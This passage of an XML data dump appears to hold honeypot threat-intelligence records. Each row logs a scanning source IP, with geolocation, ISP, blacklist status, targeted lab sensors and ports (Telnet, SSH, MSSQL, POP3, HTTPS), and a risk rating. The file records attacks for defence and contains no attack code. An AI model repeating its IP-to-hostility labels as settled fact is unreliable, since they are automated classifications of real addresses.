    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:4935"/>
    <s v="C-U&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1017"/>
    <x v="1017"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T16:36:37"/>
    <d v="2025-04-23T16:36:37"/>
    <d v="2025-04-23T16:36:37"/>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f:aeca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1018"/>
    <x v="1018"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T16:30:03"/>
    <d v="2025-04-23T16:30:03"/>
    <d v="2025-04-23T16:30:03"/>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d4:3a14"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1019"/>
    <x v="1019"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T16:24:33"/>
    <d v="2025-04-22T18:51:14"/>
    <d v="2025-04-23T16:24:33"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="01"/>
    <s v="Ilocos"/>
    <s v="Pangasinan"/>
    <s v="Bayambang"/>
    <s v="1725863"/>
    <s v="NA"/>
    <s v="15.8127"/>
    <s v="120.456"/>
    <s v="132199"/>
    <s v="Globe Telecom Inc."/>
    <s v="Globe Telecom"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4bf:244c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1020"/>
    <x v="1020"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T16:11:07"/>
    <d v="2023-11-18T16:49:57"/>
    <d v="2025-04-23T16:11:07"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="22&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Sarzedo"/>
    <s v="Sarzedo"/>
    <s v="3447969"/>
    <s v="NA"/>
    <s v="-20.0353"/>
    <s v="-44.1447"/>
    <s v="265485"/>
    <s v="UP NET TELECOM"/>
    <s v="UP NET TELECOM"/>
    <s v="business"/>
    <s v="UP NET TELECOM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a8c5:9dca"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1021"/>
    <x v="1021"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T16:01:59"/>
    <d v="2025-04-17T06:56:26"/>
    <d v="2025-04-23T16:01:59"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="Smartone"/>
    <s v="cellular"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="2010-03-04"/>
    <s v="SMARTMOBILE-AS-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b699:4bf9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1022"/>
    <x v="1022"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T14:55:29"/>
    <d v="2025-04-23T14:55:29"/>
    <d v="2025-04-23T14:55:29"/>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3d00:40cd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="Portscan &amp;&amp; Scanning Attack"/>
  </r>
  <r>
    <x v="1023"/>
    <x v="1023"/>
    <s v="NA&amp;&amp;ephraim.probe.onyphe.net"/>
    <x v="0"/>
    <d v="2025-04-23T14:51:37"/>
    <d v="2023-12-04T08:29:00"/>
    <d v="2025-04-23T14:51:37"/>
    <n v="248"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;8443&amp;&amp;63912"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="MD"/>
    <s v="Madrid"/>
    <s v="Madrid"/>
    <s v="Madrid"/>
    <s v="3117735"/>
    <s v="28070"/>
    <s v="40.4168"/>
    <s v="-3.70379"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="ONYPHE"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2017-07-25 07:27:12"/>
    <s v="2025-07-25 07:27:12"/>
    <s v="2025-03-21 14:40:42"/>
    <s v="['DNS19.OVH.NET', 'NS19.OVH.NET']"/>
    <s v="OVH, SAS"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited']"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="18"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:33fe:316a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1024"/>
    <x v="1024"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T14:38:00"/>
    <d v="2024-01-15T10:33:56"/>
    <d v="2025-04-23T14:38:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="10562&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Delhi"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:7c1f"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1025"/>
    <x v="1025"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T14:12:22"/>
    <d v="2024-12-29T16:23:53"/>
    <d v="2025-04-23T14:12:22"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3c5:f29c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1026"/>
    <x v="1026"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T14:11:00"/>
    <d v="2024-09-03T09:38:00"/>
    <d v="2025-04-23T14:11:00"/>
    <n v="126"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;43707&amp;&amp;43711&amp;&amp;43713&amp;&amp;43714&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="None"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc77:1c90"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1027"/>
    <x v="1027"/>
    <s v="220-134-42-117.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T14:10:20"/>
    <d v="2025-01-21T19:35:23"/>
    <d v="2025-04-23T14:10:20"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:2a75"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1028"/>
    <x v="1028"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:58:25"/>
    <d v="2024-07-12T06:39:00"/>
    <d v="2025-04-23T13:58:25"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;59626&amp;&amp;59649&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f4:8415"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1029"/>
    <x v="1029"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:56:22"/>
    <d v="2025-02-08T13:27:33"/>
    <d v="2025-04-23T13:56:22"/>
    <n v="37"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Rural"/>
    <s v="Hoskote"/>
    <s v="1269936"/>
    <s v="NA"/>
    <s v="13.0707"/>
    <s v="77.7981"/>
    <s v="55947"/>
    <s v="Bangalore Broadband Network Pvt Ltd"/>
    <s v="Bangalore Broadband Network Pvt Ltd"/>
    <s v="residential"/>
    <s v="Bangalore Broadband Network PVT LTD"/>
    <s v="None"/>
    <s v="BBNL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2bf7:9cca"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1030"/>
    <x v="1030"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:40:41"/>
    <d v="2025-04-23T13:40:41"/>
    <d v="2025-04-23T13:40:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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3b62:c7e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1031"/>
    <x v="1031"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T13:40:10"/>
    <d v="2025-02-21T10:19:54"/>
    <d v="2025-04-23T13:40:10"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_POP3_HC1"/>
    <s v="64168&amp;&amp;110"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown'&amp;&amp; 'spam']}"/>
    <n v="42"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Thiruvallur"/>
    <s v="Gummidipundi"/>
    <s v="1270718"/>
    <s v="NA"/>
    <s v="13.4076"/>
    <s v="80.1088"/>
    <s v="137624"/>
    <s v="Ebenezar Communications Private Limited"/>
    <s v="Ebenezar Communications Private Limited"/>
    <s v="business"/>
    <s v="Ebenezar Communications Private Limited"/>
    <s v="2018-07-13"/>
    <s v="EBECOMM"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}"/>
